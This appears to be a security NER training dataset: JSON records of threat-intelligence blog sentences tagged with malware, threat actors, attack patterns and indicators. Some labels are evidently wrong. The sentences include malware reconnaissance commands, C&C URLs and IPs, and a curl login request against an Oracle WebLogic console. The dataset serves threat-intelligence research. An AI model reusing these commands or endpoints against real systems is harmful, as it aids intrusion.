{"id":11709,"text":"Malicious version of My First APP, which adds Metasploit SideWinder has used malicious apps as part of its operation before.","entities":[{"id":36090,"label":"malware","start_offset":46,"end_offset":56},{"id":36091,"label":"threat-actor","start_offset":61,"end_offset":71}],"relations":[],"Comments":[]} {"id":4382,"text":"HYPERSCRAPE demonstrates Charming Kitten\u2019s commitment to developing and maintaining purpose-built capabilities.","entities":[{"id":13145,"label":"threat-actor","start_offset":25,"end_offset":40},{"id":50195,"label":"malware","start_offset":0,"end_offset":11}],"relations":[],"Comments":[]} {"id":12581,"text":"This looked similar to an earlier in-the-wild iOS vulnerability analyzed by Ian Beer of Google Project Zero.","entities":[],"relations":[],"Comments":[]} {"id":11292,"text":"We need to request that a download link be generated for the collected files with the \u201ctrendmicro-visionone-download-information-for-collected-forensic-file\u201d.","entities":[],"relations":[],"Comments":[]} {"id":13494,"text":"Some malicious actors, such as ransomware operators, earn directly from their cyberattacks.","entities":[],"relations":[],"Comments":[]} {"id":5386,"text":"We have evidence that the routers of at least one vendor other than Asus and WatchGuard are connecting to Cyclops Blink C&Cs as well, but so far we have been unable to collect malware samples for this router brand.","entities":[{"id":51380,"label":"malware","start_offset":106,"end_offset":119}],"relations":[],"Comments":[]} {"id":3889,"text":"They should also exercise an incident response plan and Implement regular data backup procedures on both IT and OT networks.","entities":[],"relations":[],"Comments":[]} {"id":7302,"text":"It collects the following information from the infected system by invoking the following commands: Command Description system_profiler SPHardwareDataType 2>\/dev\/null | awk '\/Processor \/ {split($0,line,\\\":\\\"); printf(\\\"%s\\\",line[2]);}' Get processor information 15f20 = system_profiler SPHardwareDataType 2>\/dev\/null | awk '\/Memory\/ {split($0,line, \\\":\\\"); printf(\\\"%s\\\", line[2]);}'","entities":[],"relations":[],"Comments":[]} {"id":14275,"text":"...","entities":[],"relations":[],"Comments":[]} {"id":3040,"text":"Many apps these days have auto-update capabilities.","entities":[],"relations":[],"Comments":[]} {"id":12391,"text":"We terminated 4 YouTube channels as part of our actions against a coordinated influence operation.","entities":[],"relations":[],"Comments":[]} {"id":4,"text":" The first known campaign was launched by Crimeware on November 2014.","entities":[{"id":45806,"label":"TIME","start_offset":55,"end_offset":68},{"id":48942,"label":"malware","start_offset":42,"end_offset":51}],"relations":[],"Comments":[]} {"id":4052,"text":"By using existing frameworks, examples of which are detailed in the following, it builds new backdoor variants more efficiently.","entities":[],"relations":[],"Comments":[]} {"id":13297,"text":"The TSSL project has 64-bit version.","entities":[{"id":41403,"label":"identity","start_offset":24,"end_offset":27}],"relations":[],"Comments":[]} {"id":10074,"text":"Trend Micro's Zero-Day Initiative (ZDI) provided technical analysis of recently patched vulnerabilities in the SolarWinds Orion Platform.","entities":[],"relations":[],"Comments":[]} {"id":11791,"text":"APT35 has relied on this technique since 2017 \u2014 targeting high-value accounts in government, academia, journalism, NGOs, foreign policy, and national security.","entities":[{"id":36358,"label":"threat-actor","start_offset":0,"end_offset":5},{"id":36360,"label":"location","start_offset":93,"end_offset":101},{"id":36362,"label":"location","start_offset":137,"end_offset":140},{"id":36363,"label":"location","start_offset":141,"end_offset":149},{"id":36364,"label":"location","start_offset":150,"end_offset":158}],"relations":[],"Comments":[]} {"id":4717,"text":"In 2019, we confronted the risks posed by NSO Group again, relying upon NSO Groups\u2019s marketing information suggesting that they had a 0-day exploit for Android.","entities":[{"id":50611,"label":"TIME","start_offset":3,"end_offset":7},{"id":50612,"label":"threat-actor","start_offset":42,"end_offset":51},{"id":50614,"label":"SOFTWARE","start_offset":152,"end_offset":159},{"id":50613,"label":"threat-actor","start_offset":72,"end_offset":82},{"id":50615,"label":"attack-pattern","start_offset":134,"end_offset":147}],"relations":[],"Comments":[]} {"id":5525,"text":"They involve a hacker deploying malicious code known as Magecart to an organization\u2019s website.","entities":[{"id":51529,"label":"malware","start_offset":56,"end_offset":64}],"relations":[],"Comments":[]} {"id":863,"text":"They\u2019ve certainly caused a wealth of damage to end users with some of the more prominent malware families, such as CryptoLocker, CryptoWall, TorrentLocker, and TeslaCrypt infecting millions of users overall.","entities":[{"id":46398,"label":"malware","start_offset":160,"end_offset":170},{"id":46399,"label":"malware","start_offset":141,"end_offset":154},{"id":46400,"label":"malware","start_offset":129,"end_offset":139},{"id":46401,"label":"malware","start_offset":115,"end_offset":128}],"relations":[],"Comments":[]} {"id":997,"text":" These accounts, which include an education (EDU) top-level domain email address with valid password, represent 42 of the world\u2019s top universities, across 10 countries: ","entities":[],"relations":[],"Comments":[]} {"id":8571,"text":"One of the most notable characteristics of APT35 is their impersonation of conference officials to conduct phishing attacks.","entities":[{"id":26488,"label":"location","start_offset":11,"end_offset":15},{"id":26490,"label":"attack-pattern","start_offset":107,"end_offset":115}],"relations":[],"Comments":[]} {"id":6470,"text":"The command is connected to 187.236.212[.]184 and downloads a file called SharpChisel.exe (SHA256: 61f83466b512eb12fc82441259a5205f076254546a7726a2e3e983011898e4e2) and saves the file to the C:\\programdata directory.","entities":[{"id":20109,"label":"IPV4","start_offset":28,"end_offset":45},{"id":20110,"label":"location","start_offset":46,"end_offset":49},{"id":20111,"label":"SHA1","start_offset":99,"end_offset":163},{"id":20112,"label":"location","start_offset":165,"end_offset":168}],"relations":[],"Comments":[]} {"id":5936,"text":" We did not capture the subsequent stages, but assess the attackers did not have exploits for the current version of Chrome (91.0.4472) at that time, but instead used n-day exploits targeting Samsung Browser, which was running an older and vulnerable version of Chromium.","entities":[{"id":18253,"label":"location","start_offset":144,"end_offset":148},{"id":18255,"label":"location","start_offset":236,"end_offset":239},{"id":18256,"label":"threat-actor","start_offset":262,"end_offset":270}],"relations":[],"Comments":[]} {"id":2714,"text":"Palo Alto Networks enterprise security platform is focused on providing an integrated approach to detecting and preventing advanced threats across each step in the attack kill-chain.","entities":[{"id":47954,"label":"identity","start_offset":0,"end_offset":18}],"relations":[],"Comments":[]} {"id":8265,"text":"The new emails used more common phishing tactics, such as alleged requests for payment confirmation.","entities":[{"id":25515,"label":"attack-pattern","start_offset":32,"end_offset":40}],"relations":[],"Comments":[]} {"id":7793,"text":"Suspicious activity using ServHelper A campaign targeting China spoofed FedEx-themed emails with subjects pertaining to delivery problems, failures, or notifications.","entities":[{"id":24138,"label":"malware","start_offset":26,"end_offset":36},{"id":24139,"label":"location","start_offset":39,"end_offset":47}],"relations":[],"Comments":[]} {"id":9513,"text":"This malware and PuppetLoader\u2019s decrypted Loader.dlls share similar strings such as \u201c[-] UnExist pwszModuleFunName:\u201d.","entities":[{"id":29189,"label":"location","start_offset":13,"end_offset":16},{"id":29190,"label":"malware","start_offset":17,"end_offset":29}],"relations":[],"Comments":[]} {"id":42,"text":"It shows the price that a criminal enterprise called IFRAME DOLLARS was charging to infect computers in various countries at that time.","entities":[{"id":44577,"label":"threat-actor","start_offset":53,"end_offset":67}],"relations":[],"Comments":[]} {"id":1982,"text":" Figure 5: WinDBG view of call stack when lsass.exe process crashes due to exploitation Vulnerable code is found in the CSsl3TlsClientContext::DigestServerHelloVerifyRequest function: Palo Alto Networks is releasing signature 37094 and 37059 to defend against these vulnerabilities.","entities":[{"id":47094,"label":"SOFTWARE","start_offset":11,"end_offset":17},{"id":47095,"label":"identity","start_offset":186,"end_offset":204}],"relations":[],"Comments":[]} {"id":4840,"text":"To help users and defenders, we will provide examples of the hack-for-hire ecosystem from India, Russia, and the United Arab Emirates and context around their capabilities and persistence mechanisms.","entities":[{"id":50794,"label":"attack-pattern","start_offset":61,"end_offset":74},{"id":50795,"label":"location","start_offset":90,"end_offset":95},{"id":50797,"label":"location","start_offset":113,"end_offset":133},{"id":50796,"label":"location","start_offset":97,"end_offset":103}],"relations":[],"Comments":[]} {"id":5349,"text":"If a command targets the core component, it can be one of the following: Command ID Action 0 Terminates the program 1 Bypasses the data-sending interval and sends data to C&C servers immediately 2 Adds a new C&C server to the list in memory 3 Sets time to send the next packet to the C&C server 4 Sets time to send the next packet to the C&C server 5 Adds a new module (an ELF file should be received following the command)","entities":[],"relations":[],"Comments":[]} {"id":11636,"text":"While tracking the activities of the SideWinder group, which has become infamous for targeting the South Asia region and its surrounding countries, we identified a server used to deliver a malicious LNK file and host multiple credential phishing pages.","entities":[{"id":35704,"label":"location","start_offset":110,"end_offset":116},{"id":35705,"label":"location","start_offset":117,"end_offset":120},{"id":35706,"label":"location","start_offset":208,"end_offset":211},{"id":35707,"label":"location","start_offset":212,"end_offset":216},{"id":35708,"label":"attack-pattern","start_offset":237,"end_offset":245}],"relations":[],"Comments":[]} {"id":3597,"text":"The different samples organized name, payload delivered and the fully-undetectable stages where the attribute \u201cKurdishCoderProduction\u201d is present","entities":[],"relations":[],"Comments":[]} {"id":249,"text":"A cybersquatting domain save-russia[.]today is launching DoS attacks on Ukrainian news sites.","entities":[{"id":44656,"label":"attack-pattern","start_offset":2,"end_offset":16},{"id":44657,"label":"DOMAIN","start_offset":24,"end_offset":43},{"id":44658,"label":"attack-pattern","start_offset":57,"end_offset":68},{"id":44659,"label":"identity","start_offset":72,"end_offset":92}],"relations":[{"id":9,"from_id":44658,"to_id":44659,"type":"targets"},{"id":114,"from_id":44656,"to_id":44657,"type":"uses"},{"id":115,"from_id":44658,"to_id":44657,"type":"uses"}],"Comments":[]} {"id":2375,"text":"We initially observed StealthVector, a shellcode loader written in C\/C++, in October 2020.","entities":[{"id":47437,"label":"malware","start_offset":22,"end_offset":35},{"id":47438,"label":"TIME","start_offset":77,"end_offset":89}],"relations":[],"Comments":[]} {"id":13546,"text":"This script is likely activated by exploiting a cross-site scripting (XSS) vulnerability in the said store\u2019s administration portal.","entities":[{"id":51622,"label":"SOFTWARE","start_offset":101,"end_offset":130},{"id":51623,"label":"malware","start_offset":5,"end_offset":11},{"id":51621,"label":"attack-pattern","start_offset":48,"end_offset":74}],"relations":[{"id":1115,"from_id":51623,"to_id":51622,"type":"targets"},{"id":1116,"from_id":51623,"to_id":51621,"type":"uses"}],"Comments":[]} {"id":1505,"text":" The backdoor when run will create threads for each connection listed in its config file. The sample that was caught by our systems contains 3 IP addresses in its config file.","entities":[],"relations":[],"Comments":[]} {"id":14111,"text":"Based on our analysis, we believe the malware author did not fake the compile times of the binaries.","entities":[],"relations":[],"Comments":[]} {"id":3975,"text":"Powerful artificial intelligence (AI) and expert security analytics correlate data from customer environments and Trend Micro\u2019s global threat intelligence to deliver fewer, higher-fidelity alerts, leading to better, early detection.","entities":[{"id":49836,"label":"identity","start_offset":114,"end_offset":125}],"relations":[],"Comments":[]} {"id":10875,"text":"Date of submission SHA256 Identified C&C servers Additional Details August 2, 2019 374d92f553c28e9dad1aa7f5d334a07dede1e5ad19c3766efde74290d0c49afb upeg-system-app[.]com Likely repacked from Kingoroot.","entities":[{"id":33101,"label":"location","start_offset":0,"end_offset":4},{"id":33103,"label":"SHA1","start_offset":88,"end_offset":152},{"id":33104,"label":"location","start_offset":177,"end_offset":183}],"relations":[],"Comments":[]} {"id":4684,"text":"Process process = new Process(); process.StartInfo.Arguments = string.Format(\"PIPE Google \\\"{0}\\\"\", text); process.StartInfo.FileName = Process.GetCurrentProcess().MainModule.FileName; process.Start();","entities":[],"relations":[],"Comments":[]} {"id":2114,"text":"On August 22, 2018, the Apache Foundation released a critical security update for CVE-2018-1176, a remote code execution vulnerability affecting Apache Struts versions 2.3 to 2.3.34 and 2.5 to 2.5.16.","entities":[{"id":47248,"label":"TIME","start_offset":3,"end_offset":18},{"id":47249,"label":"vulnerability","start_offset":82,"end_offset":95},{"id":47252,"label":"SOFTWARE","start_offset":145,"end_offset":199},{"id":47250,"label":"vulnerability","start_offset":99,"end_offset":134}],"relations":[{"id":311,"from_id":47252,"to_id":47249,"type":"has"},{"id":312,"from_id":47252,"to_id":47250,"type":"has"}],"Comments":[]} {"id":3640,"text":"Carrying out a successful conversation hijacking spear phishing attack requires knowing someone that the ultimate target is communicating with, compromising that person\u2019s account, identifying an ongoing email conversation with the ultimate target, crafting an email to appear part of that ongoing email conversation and finally sending it.","entities":[{"id":49421,"label":"attack-pattern","start_offset":49,"end_offset":63}],"relations":[],"Comments":[]} {"id":2898,"text":" s[_local28][(((_local41 - _local12) \/ 4) + 14)]","entities":[],"relations":[],"Comments":[]} {"id":5443,"text":"There were 24.5 billion mobile banking transactions while there were 20.6 billion PC-based transactions.","entities":[],"relations":[],"Comments":[]} {"id":1727,"text":" Here we explain this type of attack and what you should do.","entities":[],"relations":[],"Comments":[]} {"id":15,"text":"We found 147 new unique pieces of malware today alone, two of them fully undetectable by the legacy security solutions in VirusTotal and most of them barely detected by one vendor (few have 4\/57 detection rate).","entities":[{"id":44574,"label":"SOFTWARE","start_offset":122,"end_offset":132}],"relations":[],"Comments":[]} {"id":1783,"text":"Leave a comment below let us know what you think.","entities":[],"relations":[],"Comments":[]} {"id":726,"text":"This post is also available in: \u65e5\u672c\u8a9e (Japanese) On Sept. 14, 2021, Microsoft\u2019s Security Response Center (MSRC) released security patches detailing the findings of four critical vulnerabilities affecting the Microsoft Azure package Open Management Infrastructure (OMI).","entities":[{"id":46298,"label":"TIME","start_offset":56,"end_offset":70},{"id":44843,"label":"identity","start_offset":72,"end_offset":115},{"id":44844,"label":"SOFTWARE","start_offset":212,"end_offset":272}],"relations":[],"Comments":[]} {"id":1026,"text":"Navigating to CNRI\u2019s webmail page, we were then able to successfully access and send an email from that account.","entities":[{"id":46517,"label":"identity","start_offset":14,"end_offset":18}],"relations":[],"Comments":[]} {"id":1762,"text":"If an attacker could modify it, then any script can be run, such as downloading and executing a PE file, without any notification or alert.","entities":[],"relations":[],"Comments":[]} {"id":10555,"text":"The vast majority of these messages were sent to spam without any user ever seeing them, and we were able to preemptively block the domains using Safe Browsing.","entities":[{"id":32182,"label":"tools","start_offset":4,"end_offset":8},{"id":32183,"label":"location","start_offset":71,"end_offset":75},{"id":32184,"label":"location","start_offset":83,"end_offset":87},{"id":32185,"label":"location","start_offset":89,"end_offset":92}],"relations":[],"Comments":[]} {"id":8760,"text":"We received leads from the FBI that supported us in this investigation.","entities":[],"relations":[],"Comments":[]} {"id":2777,"text":"These new drive-by attacks focus on hijacking the computational resources of the victim\u2019s computer to \u201cmine\u201d cryptocurrency on behalf of the attackers.","entities":[{"id":48006,"label":"attack-pattern","start_offset":36,"end_offset":73}],"relations":[],"Comments":[]} {"id":2601,"text":"For example, in the \u201cproof\u201d of the Okta breach posted on the Lapsus$ Group\u2019s Telegram channel, the actor states: \u201c\u2026 our focus was ONLY on okta customers\u201d (Figure 3)","entities":[{"id":45614,"label":"identity","start_offset":138,"end_offset":142},{"id":45611,"label":"identity","start_offset":35,"end_offset":39},{"id":45612,"label":"threat-actor","start_offset":61,"end_offset":68},{"id":45613,"label":"SOFTWARE","start_offset":77,"end_offset":85}],"relations":[{"id":360,"from_id":45612,"to_id":45611,"type":"targets"}],"Comments":[]} {"id":5616,"text":"Once launched, it contacts a command and control server hosted in China using an HTTP GET request to the following website to register the infection with the attacker: http:\/\/14.17.95.205:21910\/my\/service.php.","entities":[{"id":17280,"label":"location","start_offset":37,"end_offset":40},{"id":17282,"label":"location","start_offset":126,"end_offset":134},{"id":17283,"label":"URL","start_offset":168,"end_offset":208}],"relations":[],"Comments":[]} {"id":3181,"text":" Infection chain ","entities":[],"relations":[],"Comments":[]} {"id":3307,"text":" Figure 23.","entities":[],"relations":[],"Comments":[]} {"id":11676,"text":"We found several interesting dynamic DNS domains resolving to a server that was used to deliver SideWinder\u2019s malicious documents.","entities":[],"relations":[],"Comments":[]} {"id":5199,"text":"Vulnerabilities in the standard specification","entities":[],"relations":[],"Comments":[]} {"id":10248,"text":"Yet this is not always enough to hide these activities.","entities":[],"relations":[],"Comments":[]} {"id":5531,"text":"Magecart attacks get around that.","entities":[{"id":51530,"label":"malware","start_offset":0,"end_offset":8}],"relations":[],"Comments":[]} {"id":13408,"text":"We recovered the exploit used to escape the Chrome Sandbox, but not the initial RCE exploit.","entities":[],"relations":[],"Comments":[]} {"id":13240,"text":"UserInstall.exe will abuse the BITSadmin command-line tool to create a job and launch sidebar.exe.","entities":[{"id":41285,"label":"location","start_offset":16,"end_offset":20},{"id":41286,"label":"malware","start_offset":31,"end_offset":40},{"id":41287,"label":"location","start_offset":54,"end_offset":58},{"id":41288,"label":"location","start_offset":71,"end_offset":74},{"id":41289,"label":"location","start_offset":75,"end_offset":78}],"relations":[],"Comments":[]} {"id":7238,"text":"Their blog contains write-ups and analysis of vulnerabilities that have been publicly disclosed, including \u201cguest\u201d posts from unwitting legitimate security researchers, likely in an attempt to build additional credibility with other security researchers.","entities":[{"id":22622,"label":"threat-actor","start_offset":26,"end_offset":29},{"id":22623,"label":"location","start_offset":30,"end_offset":33},{"id":22624,"label":"location","start_offset":147,"end_offset":155},{"id":22625,"label":"location","start_offset":169,"end_offset":175},{"id":22626,"label":"location","start_offset":233,"end_offset":241}],"relations":[],"Comments":[]} {"id":13765,"text":"The API address table.","entities":[],"relations":[],"Comments":[]} {"id":5378,"text":"The following data is obtained from an infected device: The Linux version, which the module gets by calling the uname() function and \/etc\/issue file Information about the device\u2019s memory consumption, which it gets by calling the sysinfo() function The SSD storage information, which it gets by calling the statvfs() function The content of the following files: \/etc\/passwd \/etc\/group \/proc\/mounts \/proc\/partitions Information about the network interfaces, which it gets by calling the if_nameindex() and iotctl() functions with the SIOCGIFHWADDR and SIOCGIFADDR commands.","entities":[{"id":51372,"label":"FILEPATH","start_offset":136,"end_offset":146},{"id":51374,"label":"FILEPATH","start_offset":382,"end_offset":392},{"id":51375,"label":"FILEPATH","start_offset":395,"end_offset":407},{"id":51376,"label":"FILEPATH","start_offset":409,"end_offset":425},{"id":51373,"label":"FILEPATH","start_offset":370,"end_offset":381}],"relations":[],"Comments":[]} {"id":2031,"text":" The HelloXD author(s) did modify the infamous file marker and mutex however, opting for dxunmgqehhehyrhtxywuhwrvzxqrcblo as the file marker and With best wishes And good intentions\u2026 as the mutex (Figure 9).","entities":[{"id":47130,"label":"malware","start_offset":5,"end_offset":12}],"relations":[],"Comments":[]} {"id":3242,"text":" Figure 15.","entities":[],"relations":[],"Comments":[]} {"id":12908,"text":"A general detection indicates that something was deemed suspicious, but it was not assigned to a specific tactic or technique.","entities":[],"relations":[],"Comments":[]} {"id":10570,"text":"Upon reviewing phishing attempts since the beginning of this year, we\u2019ve seen a rising number of attackers, including those from Iran and North Korea, impersonating news outlets or journalists.","entities":[{"id":32243,"label":"attack-pattern","start_offset":15,"end_offset":23},{"id":32246,"label":"location","start_offset":134,"end_offset":137}],"relations":[],"Comments":[]} {"id":518,"text":"Figure 3 shows ransomware arrives via different application protocols.","entities":[],"relations":[],"Comments":[]} {"id":7232,"text":"We encourage anyone who discovers a Chrome vulnerability to report that activity through the Chrome Vulnerabilities Rewards Program submission process.","entities":[],"relations":[],"Comments":[]} {"id":3285,"text":"The script used to download OBS Studio, prepare the configuration, and start the process ScreenShot","entities":[{"id":48379,"label":"SOFTWARE","start_offset":28,"end_offset":38}],"relations":[],"Comments":[]} {"id":14342,"text":"It disguised itself as the adult game named after an adult film actress.","entities":[],"relations":[],"Comments":[]} {"id":5499,"text":"Compared to Patchwork, whose Trojanized documents exploit at least five security flaws, Confucius\u2019 backdoors are delivered through Office files exploiting memory corruption vulnerabilities CVE-2015-1641 and CVE-2017-11882.","entities":[{"id":51507,"label":"attack-pattern","start_offset":144,"end_offset":172},{"id":51504,"label":"threat-actor","start_offset":88,"end_offset":97},{"id":51503,"label":"threat-actor","start_offset":12,"end_offset":21},{"id":51505,"label":"vulnerability","start_offset":189,"end_offset":202},{"id":51506,"label":"vulnerability","start_offset":207,"end_offset":221}],"relations":[{"id":1100,"from_id":51504,"to_id":51507,"type":"uses"}],"Comments":[]} {"id":10179,"text":"The actors behind this campaign, which we attribute to a group of hackers recruited in a Russian-speaking forum, lure their target with fake collaboration opportunities (typically a demo for anti-virus software, VPN, music players, photo editing or online games), hijack their channel, then either sell it to the highest bidder or use it to broadcast cryptocurrency scams.","entities":[{"id":31070,"label":"location","start_offset":23,"end_offset":31},{"id":31072,"label":"location","start_offset":113,"end_offset":117},{"id":31073,"label":"location","start_offset":124,"end_offset":130},{"id":31074,"label":"malware","start_offset":232,"end_offset":237}],"relations":[],"Comments":[]} {"id":6989,"text":"We have observed that the Remote Desktop Protocol (RDP) certificate associated in this deployment, \u201cWIN-P9NRMH5G6M8,\u201d is a common string found in previously identified Earth Karkaddan C&C servers.","entities":[{"id":21886,"label":"attack-pattern","start_offset":26,"end_offset":49},{"id":21887,"label":"malware","start_offset":51,"end_offset":54}],"relations":[],"Comments":[]} {"id":1272,"text":" Figure 5. Error message generated by Adobe.exe ","entities":[{"id":44960,"label":"FILEPATH","start_offset":38,"end_offset":47}],"relations":[],"Comments":[]} {"id":2854,"text":"Register for Ignite \u201917 Security Conference Vancouver, BC June 12\u201315, 2017 ","entities":[{"id":48060,"label":"location","start_offset":45,"end_offset":58},{"id":48061,"label":"TIME","start_offset":59,"end_offset":75}],"relations":[],"Comments":[]} {"id":3886,"text":"It also identifies how dependencies between an enterprise's IT and OT systems can give attackers a path.","entities":[],"relations":[],"Comments":[]} {"id":9997,"text":"Scans the system\u2019s Windows version and computer name m.exe Custom Mimikatz (including 32bit \/ 64bit file)","entities":[{"id":30517,"label":"location","start_offset":35,"end_offset":38},{"id":30518,"label":"malware","start_offset":66,"end_offset":74}],"relations":[],"Comments":[]} {"id":8130,"text":"All of this happens behind the overlay screen, unbeknownst to the user.","entities":[],"relations":[],"Comments":[]} {"id":4931,"text":"This is the one of the groups we disrupted during the 2020 US election cycle for its targeting of campaign staffers.","entities":[{"id":50948,"label":"TIME","start_offset":54,"end_offset":58}],"relations":[],"Comments":[]} {"id":11391,"text":"We observed fewer than three dozen installs of this spyware.","entities":[],"relations":[],"Comments":[]} {"id":4945,"text":"When they did, attackers sent them phishing links in follow-on correspondence.","entities":[{"id":50970,"label":"attack-pattern","start_offset":35,"end_offset":49}],"relations":[],"Comments":[]} {"id":14291,"text":" Figure 6.","entities":[],"relations":[],"Comments":[]} {"id":196,"text":" DDoS Attacks Impacting Ukrainian Government and Banking Institutions HermeticWiper Malware Website Defacement Rise in Phishing and Scam Attacks Increase in Cybersquatting Trends Fake Donation Websites DoS Attacks on Ukrainian News Sites Distribution of Apps How Palo Alto Networks Is Working to Keep You Safe How You Should Prepare for an Increase in Cyberthreats Such as Wipers, DDoS, Website Defacement and Other Related Attacks How Unit 42 Threat Intelligence and Security Consulting Can Help Additional Cybersecurity Resources Indicators of Compromise","entities":[{"id":45877,"label":"attack-pattern","start_offset":1,"end_offset":13},{"id":45879,"label":"attack-pattern","start_offset":84,"end_offset":109},{"id":45885,"label":"attack-pattern","start_offset":238,"end_offset":258},{"id":45889,"label":"attack-pattern","start_offset":387,"end_offset":405},{"id":45891,"label":"identity","start_offset":436,"end_offset":443},{"id":45876,"label":"malware","start_offset":70,"end_offset":83},{"id":45878,"label":"identity","start_offset":24,"end_offset":69},{"id":45880,"label":"attack-pattern","start_offset":119,"end_offset":144},{"id":45881,"label":"attack-pattern","start_offset":157,"end_offset":171},{"id":45882,"label":"attack-pattern","start_offset":179,"end_offset":201},{"id":45883,"label":"attack-pattern","start_offset":202,"end_offset":213},{"id":45884,"label":"identity","start_offset":217,"end_offset":237},{"id":45886,"label":"identity","start_offset":263,"end_offset":281},{"id":45887,"label":"attack-pattern","start_offset":373,"end_offset":379},{"id":45888,"label":"attack-pattern","start_offset":381,"end_offset":385}],"relations":[{"id":130,"from_id":45877,"to_id":45878,"type":"targets"}],"Comments":[]} {"id":965,"text":"If the device has just booted, it will start the service MySd2e, which then registers a receiver for Rf2b as shown in Figure 3.","entities":[],"relations":[],"Comments":[]} {"id":4611,"text":" Fig - Potential Chopper Webshell Detection","entities":[{"id":50511,"label":"malware","start_offset":21,"end_offset":37}],"relations":[],"Comments":[]} {"id":7355,"text":"The attackers could hide their activities if they noted the business hours of the intended targets and performed the actions coinciding with said times.","entities":[{"id":22875,"label":"TIME","start_offset":56,"end_offset":74},{"id":22876,"label":"location","start_offset":99,"end_offset":102}],"relations":[],"Comments":[]} {"id":7587,"text":"Figure 8.","entities":[],"relations":[],"Comments":[]} {"id":3942,"text":"http:\/\/{ip address\\]:7001\/wls-wsat\/CoordinatorPortType Oracle Console curl.dat -vv http:\/\/{ip address}:7001\/console\/j_security_check -d j_username={username}&j_password={password}&submit=Login\"","entities":[{"id":49789,"label":"FILEPATH","start_offset":72,"end_offset":81},{"id":49787,"label":"URL","start_offset":0,"end_offset":54},{"id":49788,"label":"URL","start_offset":85,"end_offset":134}],"relations":[],"Comments":[]} {"id":1293,"text":"It then sends the 'exit' command to this executable, which will kill this particular process.","entities":[],"relations":[],"Comments":[]} {"id":7088,"text":"Parse HTTP packets HTTP Parser https:\/\/github.com\/nodejs\/http-parser ","entities":[{"id":22204,"label":"URL","start_offset":33,"end_offset":70}],"relations":[],"Comments":[]} {"id":6238,"text":"The impact of spear-phishing attacks can be minimized by following security best practices, which include refraining from opening emails sent by suspicious sources.","entities":[{"id":19245,"label":"location","start_offset":4,"end_offset":10},{"id":19246,"label":"location","start_offset":14,"end_offset":19},{"id":19247,"label":"attack-pattern","start_offset":20,"end_offset":28},{"id":19248,"label":"location","start_offset":37,"end_offset":40},{"id":19249,"label":"location","start_offset":67,"end_offset":75},{"id":19250,"label":"location","start_offset":76,"end_offset":80}],"relations":[],"Comments":[]} {"id":13466,"text":"Our team of analysts and security experts is focused on identifying and stopping issues like phishing campaigns, zero-day vulnerabilities and hacking against Google, our products and our users.","entities":[{"id":41953,"label":"location","start_offset":21,"end_offset":24},{"id":41954,"label":"location","start_offset":25,"end_offset":33},{"id":41955,"label":"location","start_offset":68,"end_offset":71},{"id":41956,"label":"attack-pattern","start_offset":93,"end_offset":101},{"id":41958,"label":"location","start_offset":138,"end_offset":141},{"id":41960,"label":"location","start_offset":179,"end_offset":182}],"relations":[],"Comments":[]} {"id":13133,"text":"That means customers have to ask prospective providers like Trend Micro a mountain of questions.","entities":[{"id":48906,"label":"identity","start_offset":60,"end_offset":71}],"relations":[],"Comments":[]} {"id":6954,"text":"Upon enabling the macro, it will then download the ObliqueRat malware that is hidden inside an image file.","entities":[{"id":21770,"label":"location","start_offset":28,"end_offset":32},{"id":21771,"label":"tools","start_offset":51,"end_offset":61}],"relations":[],"Comments":[]} {"id":6217,"text":"We found that the returned script is a backdoor that gets its instructions from the WebSocket server.","entities":[],"relations":[],"Comments":[]} {"id":7037,"text":"The launcher\u2019s behavior changes depending on the number of arguments passed to the executable.","entities":[],"relations":[],"Comments":[]} {"id":1909,"text":"Instead of stealing documents or images, it works on top of a modified version of the legitimate Threema, an end-to-end encrypted messaging application, to steal screenshots of messages.","entities":[{"id":47032,"label":"SOFTWARE","start_offset":97,"end_offset":104}],"relations":[],"Comments":[]} {"id":10140,"text":"The logo of the target organization has been removed from the screenshot and the color was changed as not to reveal the source.","entities":[{"id":30924,"label":"location","start_offset":16,"end_offset":22},{"id":30925,"label":"location","start_offset":73,"end_offset":76},{"id":30926,"label":"attack-pattern","start_offset":120,"end_offset":126}],"relations":[],"Comments":[]} {"id":1182,"text":" don't stop me!","entities":[],"relations":[],"Comments":[]} {"id":6718,"text":"This bulletin includes coordinated influence operation campaigns terminated on our platforms in Q1 of 2020.","entities":[],"relations":[],"Comments":[]} {"id":6174,"text":"The email leverages the webmail system\u2019s search suggestion function to trigger the webpage to execute their script instead of directly running the malicious script.","entities":[],"relations":[],"Comments":[]} {"id":2080,"text":" Taking a closer look at x4k\u2019s main OS, we believe it to be a customized Kali Linux instance, tailored to his needs.","entities":[{"id":47207,"label":"threat-actor","start_offset":25,"end_offset":29},{"id":47208,"label":"SOFTWARE","start_offset":73,"end_offset":83}],"relations":[],"Comments":[]} {"id":12561,"text":"It then elevated privileges to install the payload.","entities":[],"relations":[],"Comments":[]} {"id":4439,"text":"We hope doing so will improve understanding of tactics and techniques that will enhance threat hunting capabilities and lead to stronger protections across the industry.","entities":[],"relations":[],"Comments":[]} {"id":8162,"text":" C&C Servers ms-ethics.net","entities":[],"relations":[],"Comments":[]} {"id":13535,"text":"They must also be nominated by their organization's leadership and commit to the requirements imposed by the program.","entities":[],"relations":[],"Comments":[]} {"id":4328,"text":"It downloads an ASCII file from the same domain and converts it into binary before loading it on to the memory and jump to a dynamic function.","entities":[],"relations":[],"Comments":[]} {"id":11611,"text":"This has happened to multiple spyware vendors over the past ten years, raising the specter that their stockpiles can be released publicly without warning.","entities":[{"id":35592,"label":"malware","start_offset":83,"end_offset":90},{"id":35593,"label":"location","start_offset":113,"end_offset":116}],"relations":[],"Comments":[]} {"id":1081,"text":"By submitting this form, you agree to our Terms of Use and acknowledge our Privacy Statement. ","entities":[],"relations":[],"Comments":[]} {"id":1311,"text":"These results are encrypted using the same technique mentioned previously.","entities":[],"relations":[],"Comments":[]} {"id":1496,"text":" Please mark, I'm not a robot! By submitting this form, you agree to our Terms of Use and acknowledge our Privacy Statement.","entities":[],"relations":[],"Comments":[]} {"id":8151,"text":"Google Play URL of FileManager app found in one of the C&C servers.","entities":[],"relations":[],"Comments":[]} {"id":449,"text":" This is a case where forewarned is forearmed, and that forearming can result in effective prevention. Sign up to receive the latest news, cyber threat intelligence and research from us Please enter your email address!","entities":[],"relations":[],"Comments":[]} {"id":2340,"text":"It needed the address of dlopen and dlsym patched after the binary was loaded into memory.","entities":[],"relations":[],"Comments":[]} {"id":9114,"text":"Figure 1. Exploit loading sequence in ria[.]ru (February 2012) Figure 2. [bg].ru (February 2012) found redirecting victims to Lurk\u2019s exploit kit Figure 3. Redirects to the Lurk landing page from adfox[.]ru banner network Figure 4. Malicious iframe content served by tks[.]ru (August 